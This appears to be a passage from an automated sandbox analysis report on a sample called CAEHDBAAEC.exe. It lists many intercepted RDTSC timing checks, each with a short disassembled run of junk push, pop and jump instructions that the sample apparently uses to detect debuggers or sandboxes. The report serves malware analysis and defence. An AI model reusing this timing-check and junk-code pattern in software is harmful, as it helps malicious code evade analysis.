Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75B50F second address: 73A5B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b or edx, 04B819FEh 0x00000011 call dword ptr [ebp+122D196Eh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 73A5B6 second address: 73A5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 73A5BA second address: 73A5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71A7A6 second address: 71A7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71A7AC second address: 71A7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7844CD second address: 784507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007FB424542846h 0x0000000e jmp 00007FB424542855h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB424542852h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784682 second address: 784688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7847A1 second address: 7847A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7847A5 second address: 7847A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 784D1A second address: 784D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB424542846h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709853 second address: 709857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709857 second address: 70987A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FB424542852h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 70987A second address: 709880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709880 second address: 709884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 709884 second address: 70988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E415 second address: 78E41F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E41F second address: 78E429 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4246CBDECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D67A second address: 78D697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542856h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D697 second address: 78D69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7CB second address: 78D7D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FB424542846h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7D9 second address: 78D7F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D7F3 second address: 78D811 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB424542853h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D811 second address: 78D81F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB4246CBDE6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78D81F second address: 78D823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB51 second address: 78DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FB4246CBDEEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB69 second address: 78DB7D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB424542846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jl 00007FB42454286Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78DB7D second address: 78DB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 78E14A second address: 78E15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB424542850h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 792351 second address: 792358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796870 second address: 796876 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796876 second address: 79687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79687F second address: 796888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7969DC second address: 7969E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B80 second address: 796B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B86 second address: 796B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB4246CBDE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796B91 second address: 796B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796E1D second address: 796E29 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4246CBDEEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796F96 second address: 796F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79722A second address: 79723B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jng 00007FB4246CBDECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79735E second address: 797390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542856h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB424542851h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 797890 second address: 7978A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4246CBDE6h 0x00000008 je 00007FB4246CBDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7978A0 second address: 7978C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB424542851h 0x00000007 pushad 0x00000008 jmp 00007FB42454284Ch 0x0000000d ja 00007FB424542846h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 796261 second address: 7962A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FB4246CBDEBh 0x0000000a jmp 00007FB4246CBDF3h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jbe 00007FB4246CBDEEh 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FB4246CBDECh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A127 second address: 79A12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A12B second address: 79A146 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4246CBDEFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A146 second address: 79A178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB424542856h 0x0000000c jne 00007FB424542846h 0x00000012 jmp 00007FB42454284Ah 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB42454284Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A178 second address: 79A17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A17C second address: 79A182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A182 second address: 79A18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A18C second address: 79A190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A190 second address: 79A1AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB4246CBDF6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79A1AC second address: 79A1B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CE1 second address: 799CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CE5 second address: 799CF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FB424542848h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 799CF8 second address: 799CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C85C second address: 79C860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C860 second address: 79C875 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4246CBDE6h 0x00000008 jc 00007FB4246CBDE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C875 second address: 79C87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C87C second address: 79C885 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79C885 second address: 79C88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA14 second address: 79CA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA18 second address: 79CA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA25 second address: 79CA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 79CA29 second address: 79CA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715634 second address: 715638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715638 second address: 71563C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71563C second address: 715646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 715646 second address: 71564A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71564A second address: 71567F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDECh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB4246CBDF1h 0x00000015 jg 00007FB4246CBDE6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 71567F second address: 715683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BA3 second address: 7A1BBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FB4246CBDE6h 0x00000011 jl 00007FB4246CBDE6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BBD second address: 7A1BED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FB424542846h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB424542858h 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jp 00007FB424542846h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1BED second address: 7A1BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1D79 second address: 7A1D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A1D7D second address: 7A1D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6980 second address: 7A699C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB424542855h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A699C second address: 7A69C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jo 00007FB4246CBE0Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB4246CBDEAh 0x00000016 jmp 00007FB4246CBDF1h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A69C8 second address: 7A69CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6B31 second address: 7A6B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FB4246CBDF4h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A6CB5 second address: 7A6CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AED1 second address: 75AF51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB4246CBDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FB4246CBDE8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+1248EF7Ch] 0x0000002e mov edi, 6A1DABC2h 0x00000033 add eax, ebx 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FB4246CBDE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov dword ptr [ebp+12466288h], ebx 0x00000055 push eax 0x00000056 push edi 0x00000057 jne 00007FB4246CBDECh 0x0000005d pop edi 0x0000005e mov dword ptr [esp], eax 0x00000061 mov cx, bx 0x00000064 push 00000004h 0x00000066 mov ecx, dword ptr [ebp+122D1A83h] 0x0000006c mov cx, ax 0x0000006f push eax 0x00000070 push ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 75AF51 second address: 75AF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7122 second address: 7A7130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4246CBDE6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7130 second address: 7A7148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB42454284Bh 0x00000009 jp 00007FB424542846h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7A7148 second address: 7A714D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABAD7 second address: 7ABADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABADF second address: 7ABAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7ABAEA second address: 7ABAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe RDTSC instruction interceptor: First address: 7AAD52 second address: 7AAD69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4246CBDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
